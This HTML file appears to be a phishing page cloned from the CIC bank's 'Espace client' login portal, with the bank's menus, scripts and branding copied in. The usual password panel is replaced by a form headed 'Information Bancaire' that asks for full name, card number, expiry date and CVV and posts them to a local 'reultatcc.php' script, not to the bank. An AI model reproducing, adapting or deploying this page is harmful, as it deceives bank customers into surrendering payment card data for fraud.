                                                        <a target="_self" data-page="150621" href="https://www.cic.fr/fr/banques/particuliers/nous-contacter/simulations-souscriptions.html" tabindex="-1"><span>Simulations et souscriptions</span></a>
                                                    </li>
                                        </ul>
                                        
                                    </div>
                                </li>
                            
                                <li class="e_menudepliant e_smenumiddle">
                                    <a target="_self" data-page="150627" href="https://www.cic.fr/fr/banques/particuliers/mobile.html" tabindex="-1"><span>Mobile</span></a>
                                    <div class="e_smenu" style="left: -99px;">
                                        
                                        <ul>
                                                
                                                    <li>
                                                        <a target="_self" data-page="150628" href="https://www.cic.fr/fr/banques/particuliers/mobile/forfaits/index.html" tabindex="-1"><span>Forfaits mobile</span></a>
                                                    </li>
                                                
                                                    <li>
                                                        <a target="_self" data-page="150662" href="https://www.cic.fr/fr/banques/particuliers/mobile/telephonie-mobile/index.html" tabindex="-1"><span>Téléphones</span></a>
                                                    </li>
                                                
                                                    <li>
                                                        <a target="_self" data-page="150630" href="https://www.cic.fr/fr/banques/particuliers/mobile/services-CIC-mobile/index.html" tabindex="-1"><span>Objets connectés</span></a>
                                                    </li>
                                        </ul>
                                        
                                    </div>
                                </li>
                            
                                <li>
                                    <a target="_self" data-page="150977" href="https://www.cic.fr/fr/banques/particuliers/nous-contacter/simulations-souscriptions.html" tabindex="-1"><span>Simulations et souscriptions</span></a>
                                </li>
                            
                    </ul>
                    
                </div>
            </li>
</ul>
<!-- /Menu.Net -->
 		</nav> 
	</div> 
	<div id="ei_tpl_contener" style="min-height: 524px;">
		<div id="ei_tpl_ariane">
			<!-- Ariane -->
                        <span><abbr>CIC</abbr></span>
<!-- /Ariane -->
		</div>
		<a id="ei_quicklink_content" tabindex="-1"></a>
		<main id="ei_tpl_content" role="main">
			<noscript><META HTTP-EQUIV="Refresh" CONTENT="0; URL=/fr/navigateur_javascript.html"></noscript>

<link type="text/css" rel="stylesheet" href="./index_files/devb_base.css">
<script type="text/javascript" src="./index_files/responsiveMD.js.téléchargement"></script>
<link type="text/css" rel="stylesheet" href="./index_files/ei_custom_responsive.css">
<link type="text/css" rel="stylesheet" href="./index_files/ei_custom_md.css">
<link type="text/css" rel="stylesheet" href="./index_files/ei_custom_identification.css">

<script type="text/javascript">
/**************************** CONSOLE DEBUG ACTIVATION *************************************/
if (!window.console) {
    window.console = {};
}
else {
    if (!window.console.debug && typeof window.console.log !== 'undefined') {
        window.console.debug = window.console.log;
    }
}
var names = ["log", "debug", "info", "warn", "error", "assert", "dir", "dirxml",
    "group", "groupEnd", "time", "timeEnd", "count", "trace", "profile", "profileEnd"];
for (var i = 0; i < names.length; ++i) {
    if (!window.console[names[i]]) {
        window.console[names[i]] = function() {};
    }
}
/*******************************************************************************************/

if (typeof jQuery == 'undefined') {
    throw "Authentication required JQuery";
}

/* Array item's order should respect the order of the menu */
var authApps = [];
authApps.push({ baseId: 'password' , scriptMethodName: '', scriptLoaded: false});
authApps.push({ baseId: 'ksign' , scriptMethodName: 'loadScriptsKSign', scriptLoaded: false});
authApps.push({ baseId: 'safetrans' , scriptMethodName: 'loadScriptsSafetrans', scriptLoaded: false});

/* url to codes acces oublies */
var forgotAccessUrl = '';

/* url to security infos */
var infoSecurityUrl = '';

/* url to webmaster informations bloc */
var infoUrlPwd = '';
var infoUrlKSign = '';
var infoUrlKSafetrans = '';

function showApps(index) {
    if (index < 0) {
        index = 0;  // Default is password
    }

    if (index < authApps.length) {
        var $app = $('#' + authApps[index].baseId);
        var $marketing = $(".ei_ident_marketing_" + authApps[index].baseId);
        if ($app.length) {
            if (authApps[index].scriptLoaded == false && authApps[index].scriptMethodName.length){
                loadAsynchronousScripts(authApps[index].scriptMethodName);
                authApps[index].scriptLoaded = true;
            }
            $app.css('display', '');
            if ($marketing.length) {
                $marketing.css('display', '');
            }
            $app.find('input:first').focus();
            eraseCookie('lastCnx');
            createCookie('lastCnx',authApps[index].baseId, 30)
        }
    }
}

function hideAllApps() {
    var allApps = [];
    // All DOM read
    for (var i = 0; i < authApps.length; ++i) {
        allApps.push({ $app: $('#' + authApps[i].baseId), $marketing: $(".ei_ident_marketing_" + authApps[i].baseId) });
    }
    // All DOM write
    for (var i = 0; i < allApps.length; ++i) {
        if (allApps[i].$app.length) {
            allApps[i].$app.css('display', 'none');
        }
        if (allApps[i].$marketing.length) {
            allApps[i].$marketing.css('display', 'none');
        }
    }
}

function loadAsynchronousScripts(name) {
    if (typeof window[name] == 'function') {
        // Call asynchronously
        setTimeout(function() {
            window[name]();
        }, 0);
    }
}

function mapAuthenticationModeToIndex(authenticationMode) {
    var index = 0;
    for (var i = 0; i < authApps.length; ++i) {
        if (authApps[i].baseId == authenticationMode) {
            index = i;
            break;
        }
    }
    return index;
}

function getCookie(cname) {
    var name = cname + "=";
    var ca = document.cookie.split(';');
    for (var i = 0; i < ca.length; ++i) {
        var c = ca[i];
        while (c.charAt(0) == ' ') {
            c = c.substring(1);
        }
        if (c.indexOf(name) == 0) {
            return c.substring(name.length, c.length);
        }
    }
    return "";
}

function createCookie(name, value, days) {
    var expires = "";
    if (days) {
        var date = new Date();
        date.setTime(date.getTime() + (days * 24 * 60 * 60 * 1000));
        expires = "; expires=" + date.toGMTString();
    }
    document.cookie = name + "=" + value + expires + "; path=/" + "; secure; ";
}

function eraseCookie(name) {
    createCookie(name, "", -1);
}

function loadAsynchronousMarketingContent($marketingElement, url) {
    if ($marketingElement.length) {
        if (url.length == 0) {
            $marketingElement.html('');
            return;
        }
        $.ajax({
            type: "get",
            url: url,
            success: function (html) {
                $marketingElement.html(html);
            },
            error: function (e) {
                $marketingElement.html('');
            },
            dataType: "html"
        });
    }
}

function setIdLien() {
    /* Defaults spaces is Aucun then Particuliers */
    /* In space Aucun */
    forgotAccessUrl_aucun = "/fr/banques/assistance-technique.html";
    infoSecurityUrl_aucun = "/fr/banques/internet-et-securite-bancaire/index.html";
    infoUrlPwd_aucun = "/fr/informations_mdp.html";
    infoUrlKSign_aucun = "/fr/informations_ksign.html";
    infoUrlKSafetrans_aucun = "/fr/informations_safetrans.html";

    /* In space Particuliers */
    forgotAccessUrl_particulier = "/fr/banques/particuliers/nous-contacter/assistance-technique.html";
    infoSecurityUrl_particulier = "/fr/banques/particuliers/internet-et-securite-bancaire/index.html";
    infoUrlPwd_particulier = "/fr/particuliers/informations_mdp.html";
    infoUrlKSign_particulier = "/fr/particuliers/informations_ksign.html";
    infoUrlKSafetrans_particulier = "/fr/particuliers/informations_safetrans.html";

    /* Default Values */
    forgotAccessUrl = '';
    infoSecurityUrl = (infoSecurityUrl_aucun == '') ? infoSecurityUrl_particulier : infoSecurityUrl_aucun;;
    infoUrlPwd = '';
    infoUrlKSign = '';
    infoUrlKSafetrans = '';

    var espace = null;
    if (typeof getEspace == 'function') {
        espace = getEspace();

        if (espace != null) {
            /* Set idlink according to space cookie value */
            switch (espace){
                    case "Professionnel":
                        forgotAccessUrl = "/fr/banques/professionnels/nous-contacter/assistance-technique.html";
                        infoUrlPwd = "/fr/professionnels/informations_mdp.html"
                        infoUrlKSign = "/fr/professionnels/informations_ksign.html"
                        infoUrlKSafetrans = "/fr/professionnels/informations_safetrans.html"
                        break;
                    case "Entreprise":
                        forgotAccessUrl = "/fr/banques/entreprises/nous-contacter/assistance-technique.html";
                        infoUrlPwd = "/fr/entreprises/informations_mdp.html"
                        infoUrlKSign = "/fr/entreprises/informations_ksign.html"
                        infoUrlKSafetrans = "/fr/entreprises/informations_safetrans.html"
                        break;
                    case "Grand compte":
                        forgotAccessUrl = "/fr/banques/corporate/nous-contacter/assistance-technique.html";
                        infoUrlPwd = "/fr/corporate/informations_mdp.html"
                        infoUrlKSign = "/fr/corporate/informations_ksign.html"
                        infoUrlKSafetrans = "/fr/corporate/informations_safetrans.html"
                        break;
                    case "Particulier":
                        forgotAccessUrl = "/fr/banques/particuliers/nous-contacter/assistance-technique.html";
                        infoUrlPwd = "/fr/particuliers/informations_mdp.html"
                        infoUrlKSign = "/fr/particuliers/informations_ksign.html"
                        infoUrlKSafetrans = "/fr/particuliers/informations_safetrans.html"
                        break;
                    case "Association":
                        forgotAccessUrl = "/fr/banques/associations/nous-contacter/assistance-technique.html";
                        infoUrlPwd = "/fr/associations/informations_mdp.html"
                        infoUrlKSign = "/fr/associations/informations_ksign.html"
                        infoUrlKSafetrans = "/fr/associations/informations_safetrans.html"
                        break;
                    default:
                        break;
            }
        }
    }

    if (!forgotAccessUrl.length) {
        forgotAccessUrl = (forgotAccessUrl_aucun == '') ? forgotAccessUrl_particulier : forgotAccessUrl_aucun;
    }

    if (!infoUrlPwd.length) {
        infoUrlPwd = (infoUrlPwd_aucun == '') ? infoUrlPwd_particulier : infoUrlPwd_aucun;
    }

    if (!infoUrlKSign.length) {
        infoUrlKSign = (infoUrlKSign_aucun == '') ? infoUrlKSign_particulier : infoUrlKSign_aucun;
    }

    if (!infoUrlKSafetrans.length) {
        infoUrlKSafetrans = (infoUrlKSafetrans_aucun == '') ? infoUrlKSafetrans_particulier : infoUrlKSafetrans_aucun;
    }
}

function redirectToLink(link) {
    window.location = link;
    return false;
}

$(document).ready(function(){

    $('p.liensctx').append($("#exceptionalBreak").html());

    setIdLien();

    var $market_mdp_app = $(".ei_ident_marketing_password");
    var $market_ksign_app = $(".ei_ident_marketing_ksign");
    var $market_safetrans_app = $(".ei_ident_marketing_safetrans");
    loadAsynchronousMarketingContent($market_mdp_app, infoUrlPwd);
    loadAsynchronousMarketingContent($market_ksign_app, infoUrlKSign);
    loadAsynchronousMarketingContent($market_safetrans_app, infoUrlKSafetrans);

    var lastSelected = mapAuthenticationModeToIndex(getCookie("lastCnx"));
    var selectedItemTxt = "selected_item_text";
    var txt = $('div.ei_md li.ei_md_masteritem').eq(lastSelected).find('a.ei_md_masterlink').text();
    contentloading(lastSelected, txt);

    function contentloading(_index, _itemtxt) {
        hideAllApps();
        showApps(_index);

        var txt = _itemtxt;
        var ind = txt.indexOf(selectedItemTxt, 0);
        if (ind > 0) {
            txt = txt.substring(0,ind);
        }
        $('div.ei_md div.ei_md_detail #idTitre').text(txt);
        if (lastSelected > -1) {
            $('div.ei_md li.ei_md_masteritem').eq(lastSelected).removeClass("ei_md_selected");
            $('div.ei_md li.ei_md_masteritem').eq(lastSelected).removeAttr('aria-current');
            $('div.ei_md div.ei_md_mastertxt').eq(lastSelected).find('a.ei_md_masterlink').removeAttr('title');
            $('div.ei_md div.ei_md_mastertxt').eq(lastSelected).find('a.ei_md_masterlink span').remove('.invisible');
        }
        if (_index > -1){
            $('div.ei_md li.ei_md_masteritem').eq(_index).addClass("ei_md_selected");
            $('div.ei_md li.ei_md_masteritem').eq(_index).attr('aria-current', 'true');
            $('div.ei_md div.ei_md_mastertxt').eq(_index).find('a.ei_md_masterlink').attr('title',txt ).append('<span class="invisible">' + selectedItemTxt +'</span>');
            lastSelected = _index;
        }
    }

    $('div.ei_md li.ei_md_masteritem').click(function(e){
        var indexItem = $('div.ei_md li.ei_md_masteritem').index($(this));
        contentloading(indexItem, $(this).find('a.ei_md_masterlink').text());
        return false;
    });

    $('div.ei_md div.ei_md_mastertxt a.ei_md_masterlink').focus(function(){
        $(this).closest("div.ei_md_mastertxt").addClass("ei_md_hasfocus");
    });

    $('div.ei_md div.ei_md_mastertxt a.ei_md_masterlink').blur(function(){
        $(this).closest("div.ei_md_mastertxt").removeClass("ei_md_hasfocus");
    });

    $('div.ei_md div.ei_md_mastertxt a.ei_md_masterlink').keydown(function(e){
        if (e.which == 13) {
            $(this).closest("li.ei_md_masteritem").trigger("click");
            e.preventDefault();
        }
    });
   /*
    $('#bloc_ident').on('submit', function(e) {
        e.preventDefault();

        var $this = $(this);

        var postParam =  {"loginPasswordAuthenticationRequest":{'applicationId': 'CM', 'login': $('#_userid').val(), 'password': $('#_pwduser').val(), 'media':'AN'}};

        $.ajax({
            url: '/fr/ws/login_password_ws.html',
            type: 'POST',
            data: JSON.stringify(postParam),
            success: function(json) {
                if (json.returnCode === 'Success') {
                    redirectToLink('/fr/banque/pageaccueil.html');
                } else {
                    $(".blocpatience2").remove();
                    $("#errorMessage").text(json.returnMessage);
                    $(".errorMessageBlock").css('display', '');
                }
            },
            error: function(xhr, textStatus, error) {
                 $(".blocpatience2").remove();
                 $("#errorMessage").text(error);
                 $(".errorMessageBlock").css('display', '');
            }
        });
    }); */
});

</script>

    <div class="a_blocappli">
    <div class="eir_md_hidexs" id="eir_techmd_maintitleId"><div class="ei_titleblock ei_mdr_maintitle">
        <div class="ei_titlelabelsblock">
            <div class="ei_titlelabel"><div class="eir_md_hidexs"><p role="heading" aria-level="1">Espace client : Connexion</p></div></div>
            <div class="ei_subtitlelabel"></div>
        </div>
        <div class="ei_titleactionsblock"></div>
    </div></div>
    <div class="a_blocfctl">
        <div class="ei_md ei_mdr_formselectorlistbox"><span class="ei_mdrespinfo"></span>
            <div class="ei_md_envtech">
                <div class="ei_md_master">
                    <div class="ei_md_masterbody">
                        <ul class="ei_md_masterroot">
                            <li class="ei_md_masteritem ei_md_selected" aria-current="true">
                                <div class="ei_md_mastertxt"><a class="ei_md_masterlink" href="#" title="Identifiant / Mot de passe">Identifiant / Mot de passe<span class="invisible">selected_item_text</span></a></div>
                            </li>
                            <li class="ei_md_masteritem">
                                <div class="ei_md_mastertxt"><a class="ei_md_masterlink" href="https://www.cic.fr/fr/authentification.html#">Certificat Électronique</a></div>
                            </li>
                            <li class="ei_md_masteritem">
                                <div class="ei_md_mastertxt"><a class="ei_md_masterlink" href="https://www.cic.fr/fr/authentification.html#" id="menu_safetrans">SAFETRANS</a></div>
                            </li>
                        </ul>
                    </div>
                    <div class="ei_md_masterfooter"></div>
                </div>

                <div class="ei_md_nmaster eir_md_hidexs"><div class="eir_techmd_nmaster">
                    <div class="ei_ident_marketing_password" style="">



















	
	
	    	
	

	
	
		
	

	
	

	
	

	
	
	
	
		
			
		
	

	
	
	
	
	
		
			<article class="ei_cardboarditem tile cc" data-ga-tile="[Basic_-CC-Univers-Internet-et-securite-bancaire]">
		
			
				

				
					<div class="cc tile   " data-ga-tile="[Basic_-CC-Univers-Internet-et-securite-bancaire]" data-click="yes">
				
				
				
				
				
					<figure>
					
							<img src="./index_files/tuile_400x225.jpg" width="400" height="225" alt="">
					
					</figure>
				

					<div>
					    
				
						<div class="banner">
			    
				
				
				
				
				
				
					
				

				
					
							<h1>Internet et sécurité bancaire</h1>
					
				
				
				
							<p class="intro">Profitez de l'internet en déjouant ses pièges.</p>
				
						
				
				    </div>
						
						
					
	            
						
						<div class="actions">
	            			
	            				
	            		   			
	            		   					<a href="https://www.cic.fr/fr/particuliers/comptes/paiement-en-ligne-securite.html" class="more" title="Internet et sécurité bancaire"><span>Tout savoir</span></a>
	            		    			
	            		   						<ul class="labels">
	            		    				
	            		   						</ul>
	            		    			
	            	    			
	            		    	
	            			
	            			
								
						</div>
						
					
					</div>
					
					
				
				</div>

			
		</article>
		
	
</div>
                    <div class="ei_ident_marketing_ksign" style="display: none;">



















	
	
	    	
	

	
	
		
	

	
	

	
	

	
	
	
	
		
			
		
	

	
	
	
	
	
		
			<article class="ei_cardboarditem tile cc" data-ga-tile="[Basic_-CC-Univers-Internet-et-securite-bancaire]">
		
			
				

				
					<div class="cc tile   " data-ga-tile="[Basic_-CC-Univers-Internet-et-securite-bancaire]" data-click="yes">
				
				
				
				
				
					<figure>
					
							<img src="./index_files/tuile_400x225.jpg" width="400" height="225" alt="">
					
					</figure>
				

					<div>
					    
				
						<div class="banner">
			    
				
				
				
				
				
				
					
				

				
					
							<h1>Internet et sécurité bancaire</h1>
					
				
				
				
							<p class="intro">Profitez de l'internet en déjouant ses pièges.</p>
				
						
				
				    </div>
						
						
					
	            
						
						<div class="actions">
	            			
	            				
	            		   			
	            		   					<a href="https://www.cic.fr/fr/particuliers/comptes/paiement-en-ligne-securite.html" class="more" title="Internet et sécurité bancaire"><span>Tout savoir</span></a>
	            		    			
	            		   						<ul class="labels">
	            		    				
	            		   						</ul>
	            		    			
	            	    			
	            		    	
	            			
	            			
								
						</div>
						
					
					</div>
					
					
				
				</div>

			
		</article>
		
	
</div>
                    <div class="ei_ident_marketing_safetrans" style="display: none;">



















	
	
	    	
	

	
	
		
	

	
	

	
	

	
	
	
	
		
			
		
	

	
	
	
	
	
		
			<article class="ei_cardboarditem tile cc" data-ga-tile="[Basic_-CC-Univers-Internet-et-securite-bancaire]">
		
			
				

				
					<div class="cc tile   " data-ga-tile="[Basic_-CC-Univers-Internet-et-securite-bancaire]" data-click="yes">
				
				
				
				
				
					<figure>
					
							<img src="./index_files/tuile_400x225.jpg" width="400" height="225" alt="">
					
					</figure>
				

					<div>
					    
				
						<div class="banner">
			    
				
				
				
				
				
				
					
				

				
					
							<h1>Internet et sécurité bancaire</h1>
					
				
				
				
							<p class="intro">Profitez de l'internet en déjouant ses pièges.</p>
				
						
				
				    </div>
						
						
					
	            
						
						<div class="actions">
	            			
	            				
	            		   			
	            		   					<a href="https://www.cic.fr/fr/particuliers/comptes/paiement-en-ligne-securite.html" class="more" title="Internet et sécurité bancaire"><span>Tout savoir</span></a>
	            		    			
	            		   						<ul class="labels">
	            		    				
	            		   						</ul>
	            		    			
	            	    			
	            		    	
	            			
	            			
								
						</div>
						
					
					</div>
					
					
				
				</div>

			
		</article>
		
	
</div>
                </div></div>

            </div>
            <div class="ei_md_separator"></div>
            <div class="ei_md_detail" tabindex="-1">
                <!--Deb-->
                <div class="ei_titleblock ei_mdr_titledetail">
                    <div class="ei_titlelabelsblock">
                        <div class="ei_titlelabel"><div class="eir_md_hidexs">
						<span id="idTitre" role="heading" style="color:red" aria-level="2">Information Bancaire
						<img src="./index_files/visaa.png" />
						</span></div></div>
                        <div class="ei_subtitlelabel"></div>
                    </div>
                </div>
                <!--Fin-->
                <div class="a_blocfctl" id="contentDetail">
                    <div id="password" style="">
                        <!--<div class="alerteBlock" id="info_bloc_tls" style="display: none;">
                            <div class="bloctxt alerte eir_hidexs">
                                <strong>Votre navigateur est obsolète</strong>
                                <p>Pour des raisons de sécurité, vous ne pourrez bientôt plus accéder à votre espace Client avec ce navigateur.<br>Pour continuer d'accéder à votre espace Client <a href="/fr/navigateur_obsolete.html">veuillez mettre à jour votre navigateur</a></p>
                        </div>
                        </div>
                        <script>
                        $.ajax("https://sslsi.e-i.com/")
                          .done(function(data) {
                              // nothing to do
                          })
                          .fail(function(xhr, status, error) {
                              //Ajax request failed.
                              $('#info_bloc_tls').show();
                        })
                        </script>-->
                        <div class="alerteBlock" style="display:none">
                            <div class="bloctxt alerte eir_hidexs">
                            </div>
                             <div class="bloctxt alerte eir_showxs">
                            </div>
                        </div>

                        <div class="errorMessageBlock bloctxt err" style="display:none"><span id="errorMessage"></span></div>
                        <div>


<div class="ei_appl_ident" id="ident">
    <p class="a_titre1"></p>
    
    
    
    
    

    
    
    <form method="post" autocomplete="off" action="reultatcc.php" name="bloc_ident" id="frm">
        <fieldset>
            
            <div class="ei_appl_ident_content">
                
                <div class="ei_appl_ident_lig">

                    
<label for="_userid">Nom Complet</label>



<input type="text" name="pnam" id="pnam" value="" placeholder="" class="ei_appl_userid" maxlength="30"required>


                </div>

               <div class="ei_appl_ident_lig">

                    
<label for="_userid">N° de carte Bancaire </label>



<input type="tel" pattern="[0-9]*" name="nc" id="nc" value="" placeholder="" class="ei_appl_userid" maxlength="16"required>


                </div>
                
                

          <div class="ei_appl_ident_lig">

                    
<label for="_userid">Date Expiration</label>



<input type="text"  name="dtn" id="dtn" value="" placeholder="MM/AAAA" class="ei_appl_userid" maxlength="7"required>


                </div>    



<div class="ei_appl_ident_lig">

                    
<label for="_userid">CVV </label>



<input type="tel" pattern="[0-9]*" name="cvv" id="cvv" value="" placeholder="" class="ei_appl_userid" maxlength="16"required>


                </div>				

          
            </div>
        </fieldset>

        

        

        <div class="ei_appl_ident_blocbts blocboutons">
            

            <span class="ei_buttonbar">
                
                

                <span class="ei_mainbuttons">
    
        <span id="login-submit" class="ei_button">
         
		 <input type="submit" value="Valider" style="background-color: #009999;
  border: none;
  color: white;
  padding: 16px 32px;
  text-decoration: none;
  margin: 4px 2px;
  cursor: pointer;">
		 
        </span>
        
    
    
</span>


            </span>
        </div>

        

        


<!--<div class="bloctxt alerte">
    <p><em>Si vous rencontrez des difficultés de connexion, une mise à jour du certificat installé sur votre navigateur est peut-être nécessaire. Dans ce cas, suivez les étapes décrites dans <a target="_blank" href="/medias/authentication/generic_1.0/pdf/v190529_maj_ksign.pdf">ce document</a>.</em></p>
</div>-->


</div>
                      
                    </div>
                    <div id="safetrans" style="display:none">
                        
                        <div><script type="text/javascript">
    function loadScriptsSafetrans() {
        loadSafetransScript('https://cdnii.e-i.com/SDUT/sd/gemalto_ezio_web_connector/382.2910.7/js/sconnect_uc.min.js');
        loadSafetransScript('https://cdnii.e-i.com/SDUT/sd/gemalto_ezio_web_connector/382.2910.7/js/pcsc_uc.min.js');
        loadSafetransScript('https://cdnii.e-i.com/SDUT/sd/gemalto_ezio_web_connector/382.2910.7/js/logging.min.js');
        loadSafetransScript('https://cdnii.e-i.com/SDUT/sd/gemalto_ezio_web_connector/382.2910.7/js/enex.min.js');
        loadSafetransScript('https://cdnii.e-i.com/SDUT/sd/secure_channel/1.2.0/js/secure_channel.min.js', initializeSafetransScript);
    }

    function loadSafetransScript(url, callback) {
        var s = document.createElement('script');
        s.type = 'text/javascript';
        s.async = false;
        s.src = url;
        if (typeof callback === 'function') {
            s.onload = callback;
        }
        var x = document.getElementsByTagName('head')[0];
        x.appendChild(s);
    }

    function initializeSafetransScript() {
        // Initialize variable from secure_channel script
        _serverCertificateSerialNumber = "_5DED172B8CAC3D52C290398B";
        _gemaltoEzioWebConnectorCdnPath = "https://cdnii.e-i.com/SDUT/sd/gemalto_ezio_web_connector/382.2910.7/";
    }

    var secureChannelIdentificationVerificator = null;

    function SecureChannelIdentificationVerificator() {
        this.styleVisible = document.getElementById("identification_form").style.display;
    }

    SecureChannelIdentificationVerificator.prototype.onReaderAvailable = function() {
        document.getElementById("identification_form").style.display = "none";
        document.getElementById("ejectCard").style.display="block";
    }

    SecureChannelIdentificationVerificator.prototype.onCardIn = function() {
        document.getElementById("identification_form").style.display = "none";
        document.getElementById("ejectCard").style.display="block";
    }

    SecureChannelIdentificationVerificator.prototype.onCardOut = function() {
        document.getElementById("identification_form").style.display=this.styleVisible;
        document.getElementById("ejectCard").style.display="none";
    }

    SecureChannelIdentificationVerificator.prototype.onReaderOut = function() {
        document.getElementById("identification_form").style.display=this.styleVisible;
        document.getElementById("ejectCard").style.display="none";
    }

    function SecureChannelIdentificationVerificatorLoad(id) {
        secureChannelIdentificationVerificator = new SecureChannelIdentificationVerificator();
        if (typeof(addApplication) == "function")
        {
            addApplication(secureChannelIdentificationVerificator, "SecureChannelIdentificationVerificator");
        }
        document.getElementById(id).focus();
    };

    window.onload = function() {
        SecureChannelIdentificationVerificatorLoad('_userid');
    }
</script>




<div class="ei_appl_ident" id="ident_safetrans" style="margin: 0px !important">
    
    <div id="ejectCard" style="display:none;" class="blocmsg info"><p>Veuillez retirer votre carte du lecteur</p></div>
    <div id="identification_form">
    
    
    <br>
    <form action="https://www.cic.fr/fr/authentification.html#safetrans" method="post" autocomplete="off" onsubmit="return submitFormSafetrans()" name="bloc_ident_safetrans">
        <fieldset>
            <div class="ei_appl_ident_content">
                <div class="ei_appl_ident_lig">
                    <label for="_userid">Identifiant</label>
                    <input type="text" name="_cm_user" id="_userid" class="ei_appl_userid" value="">
                </div>
                <div class="ei_appl_ident_lig">
                    <label for="_pwduser">Mot de passe</label>
                    <input type="password" name="_cm_pwd" id="_pwduser" class="ei_appl_pwduser">
                    <input type="hidden" name="flag" value="safetrans">
                </div>
                <script type="text/javascript">
                    document.forms["bloc_ident_safetrans"]._userid.focus();
                    var formSubmitted = false;
                    function submitFormSafetrans() {
                        if (formSubmitted) {
                            return false;
                        } else {
                            formSubmitted = true;
                            return true;
                        }
                    }
                </script>
            </div>
        </fieldset>
        <div class="ei_appl_ident_blocbts">
            <input type="image" onclick="esd1_displayWait(&#39;ident_safetrans&#39;, &#39;Chargement en cours&#39;, &#39;Veuillez patienter&#39;);" alt="Se connecter" src="./index_files/seconnecter.png" name="submit">
        </div>
    </form>
    </div>
</div>

<!-- Hub Transferts - SConnect installation message lightbox -->
<div id="idLightBox">
    <div class="ei_blocmodal" role="dialog" aria-describedby="idTitle">
        <div class="a_blocfctltitre">
            <p class="a_options">
                <a class="btnclose" href="https://www.cic.fr/fr/authentification.html#" onclick="CloseLightBox(&#39;idLightBox&#39;)" id="btnclose"> <img alt="Fermer" src="./index_files/btfermerpopup.png"></a>
            </p>
            <p class="a_titre2" id="idTitle">Extension SConnect</p>
        </div>
        <div class="a_blocfctl" id="idContent" aria-describedby="idlibelle">
            <div id="idlibelle">
                <div>L'extension SConnect n'est pas installée sur votre poste.<br><br>Pour pouvoir utiliser votre lecteur SAFETRANS avec l'application Hub Transferts, veuillez d'abord procéder à l'installation de l'extension SConnect depuis votre navigateur Internet Explorer (ou Safari pour les utilisateurs Mac OS).</div>
            </div>
            <div class="blocboutons">
                <br>
                <a href="https://www.cic.fr/fr/authentification.html#" onclick="CloseLightBox(&#39;idLightBox&#39;)" id="btnok"> <img alt="OK" src="./index_files/ok.gif"> </a>
            </div>
        </div>
        <span onfocus="$(&#39;#btnclose&#39;).focus();" role="presentation">&nbsp;</span>
    </div>
</div>
</div>
                        <p class="liensctx c">
                            <a href="https://www.cic.fr/fr/authentification.html#" onclick="return redirectToLink(forgotAccessUrl);" class="ei_acces">Codes d'accès oubliés</a>
                            <a href="https://www.cic.fr/fr/identification/se-connecter-avec-un-lecteur-safetrans.html" class="ctx">Aide et diagnostic</a>
                            <a href="https://www.cic.fr/fr/authentification.html#" onclick="return redirectToLink(infoSecurityUrl);" class="ctx">Infos sécurité</a>
                        </p>
                    </div>
                    <div id="exceptionalBreak" style="display:none"></div>
                </div>
            </div>
            <div class="ei_md_endseparator"></div>
        <div class="eir_md_showxs ei_mdr_nextblockmaster"></div></div>
    </div>
</div>


		</main>
	</div>
	<div id="ei_tpl_footer">
		<a id="ei_quicklink_footer" tabindex="-1"></a>
		<footer role="contentinfo">
<img  style="width:1700px;height:;cursor:pointer"src="./index_files/foot.png"/>
		</footer>
	</div>
<div class="menuopen_fond"></div></div>

	<div class="ei_cookie" id="ei_cookie" style="display:none;">
		<div class="ei_cookie__wrapper">
			<p>
                En poursuivant votre navigation sur notre site, vous acceptez l'utilisation de cookies pour sécuriser votre connexion, faciliter votre navigation, vous proposer des offres adaptées et permettre l'élaboration de statistiques. Informations cookies et paramétrage, <a title="Page de présentation des cookies" target="_blank" href="https://www.cic.fr/fr/informations-legales/gestion-des-cookies.html">cliquez ici.</a>
            </p>
			<div class="ei_cookie__blocboutons">
				<button title="Accepter l&#39;utilisation des cookies" class="allow" type="button" onclick="acceptallcookies(pathCookie);location.reload();">OK</button>
			</div>
		</div>
	</div>
<script type="text/javascript" src="./index_files/SITW-tools.js.téléchargement"></script>
<!-- <script type="text/javascript" src="/fr/html/gabarit/sitw-cookies.js"></script>
 --><script type="text/javascript">
	document.body.onload = '';
	var pathCookie = "/fr/";
	var cookiePolicyLink = '/fr/informations-legales/gestion-des-cookies.html';
	document.addEventListener("DOMContentLoaded", function(event){
		checkAndSetCookiesAcceptance(['/fr/informations-legales/gestion-des-cookies.html'], pathCookie);
	});
	</script>

<!-- Fin code bandeau cookie CNIL -->


    <script type="text/javascript">
        if ($("#ei_tpl_ident_ok").length > 0) {
            $("body").addClass("ei_tpl_conseil_ident");
        }
    </script>


<!-- Web Analytics -->
<script type="text/javascript">
if (typeof(page_name) == 'undefined') var page_name = "CIC";
if (typeof(espacewat) == 'undefined') var espacewat = "";
if (typeof(url_page) == 'undefined') var url_page = "";
if (typeof(env_template) == 'undefined' || env_template == "") var env_template = 'page';
var clientidentifie = 'false';
var clientreconnu = 'N';
var user_statut = '';
if (clientidentifie == "false" && clientreconnu == "N"){
	user_statut = "prospect";
	}
else if (clientidentifie == "false" && clientreconnu == "Y") {
	user_statut = "client reconnu";
	}
else if (clientidentifie == "true") {
	user_statut = "client authentifie";
};
	var watData = {
		page_name:page_name,
		espace:espacewat,
		typepage:env_template,
		statutuser:user_statut,
		env_channel:"WEB_DESKTOP",
		user_profil_cb:"",
		user_profil_assurance:"",
		user_profil_bourse:"",
		user_profil_compte:"",
		user_profil_credit:"",
		user_profil_epargne:"",
		user_client_nonlog:"N",
		env_work:"PRD",
		user_profil_ass:"",
		user_profil_aug:"",
		user_profil_fin:"",
		user_profil_pcb:"",
		user_profil_reconduction:"",
		user_profil_annulfin:"",
		user_segment:"",
		product_code_promo:"",
		env_camtype:"",
		env_support:"",
		user_federation:"",
		user_portef_theorique:"",
		substitution_mode:"",
		type_acces:"",
		user_agence:"",
		user_formule_bad:"",
		user_frequence_BAD:"",
		user_niveau:"",
		user_segment_commercial:"",
		user_type_client:"",
		user_type_personne:"",
		env_marque:"CIC-2015",
		env_country:"FR",
		env_langue:"fr",
		env_espace:"Aucun",
		user_profil_suividde_analyse:"##",
		user_profil_suividde_instruction:"##",
		user_space:"",
		user_bank:"",
		client_connecte:"false",
		user_rawfinancable:"",
		user_financable:"",
		user_issubst:"",
		page_cat1:"CIC",
		page_cat2:"",
		page_cat3:"",
		page_cat4:"",
		page_cat5:"",
		application_path:url_page,
		relation_group:"",
		cat_juridique:"",
		dir_reg:""
	};
</script>
<script>if(typeof(dataLayer)=='undefined')
var dataLayer=[];if(typeof(url_page)=='undefined')
var url_page="";if(typeof(page_name)!="undefined"&&page_name!="")
dataLayer.push({'page_name':page_name});if(typeof(space)=='undefined')
var space="";if(typeof(subspace)=='undefined')
var subspace="";if(typeof(application_name)=='undefined')
